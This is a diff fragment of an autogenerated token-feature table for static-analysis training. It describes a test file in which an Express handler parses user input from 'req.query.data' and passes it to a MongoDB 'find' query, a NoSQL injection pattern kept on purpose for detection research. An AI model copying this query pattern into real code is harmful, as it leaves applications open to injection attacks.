+| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:31:64:1 | return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:32:46:34 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:37:46:39 | res | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:37:46:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:37:46:39 | res | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:37:46:39 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:46:37:46:39 | res | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:15 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:15 | MongoClient | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:15 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:15 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:23 | MongoClient.connect | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:23 | MongoClient.connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:23 | MongoClient.connect | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:23 | MongoClient.connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:47:23 | MongoClient.connect | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | MongoCl ... \\n }) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | MongoCl ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | MongoCl ... \\n }) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | MongoCl ... \\n }) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | exceptional return of MongoCl ... \\n }) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | exceptional return of MongoCl ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | exceptional return of MongoCl ... \\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:5:63:6 | exceptional return of MongoCl ... \\n }) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:17:47:23 | connect | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:17:47:23 | connect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:17:47:23 | connect | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:17:47:23 | connect | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:17:47:23 | connect | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | calleeImports | mongodb | @@ -784,6 +4409,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:25:47:56 | 'mongod ... 7/test' | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | joiSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | joiSchema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | joiSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | joiSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:47:58 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | 'arguments' object of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | 'arguments' object of anonymous function | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | CalleeFlexibleAccessPath | MongoClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | calleeImports | mongodb | @@ -793,6 +4433,71 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | async ( ... }\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | exceptional return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | exceptional return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | exceptional return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:59:63:5 | return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:66:47:68 | err | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:66:47:68 | err | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:66:47:68 | err | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:66:47:68 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:66:47:68 | err | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:47:71:47:72 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc = d ... ('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc = d ... ('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc = d ... ('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc = d ... ('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:13:48:38 | doc = d ... ('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:20 | db | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:20 | db | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:20 | db | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:20 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:20 | db | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:31 | db.collection | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:31 | db.collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:31 | db.collection | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:31 | db.collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:31 | db.collection | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | db.collection('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | db.collection('doc') | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | db.collection('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | db.collection('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | exceptional return of db.collection('doc') | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | exceptional return of db.collection('doc') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | exceptional return of db.collection('doc') | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | exceptional return of db.collection('doc') | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:19:48:38 | exceptional return of db.collection('doc') | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:22:48:31 | collection | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:22:48:31 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:22:48:31 | collection | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:22:48:31 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:22:48:31 | collection | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | CalleeFlexibleAccessPath | db.collection | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | contextFunctionInterfaces | validate(x) | @@ -801,11 +4506,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:48:33:48:37 | 'doc' | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:19 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:19 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:19 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:19 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:19 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query = ... y.data) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query = ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query = ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query = ... y.data) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:15:50:48 | query = ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:26 | JSON | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:26 | JSON | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:26 | JSON | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:26 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:26 | JSON | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:32 | JSON.parse | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:32 | JSON.parse | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:32 | JSON.parse | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:32 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:32 | JSON.parse | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | contextFunctionInterfaces | validate(x) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | JSON.pa ... y.data) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | exceptional return of JSON.pa ... y.data) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | exceptional return of JSON.pa ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | exceptional return of JSON.pa ... y.data) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data validate joiSchema validate query validate error doc find query doc find query joiSchema validateAsync query doc find query e doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:50:23:50:48 | exceptional return of JSON.pa ... y.data) | enclosingFunctionName | app.post#functionalargument | +| 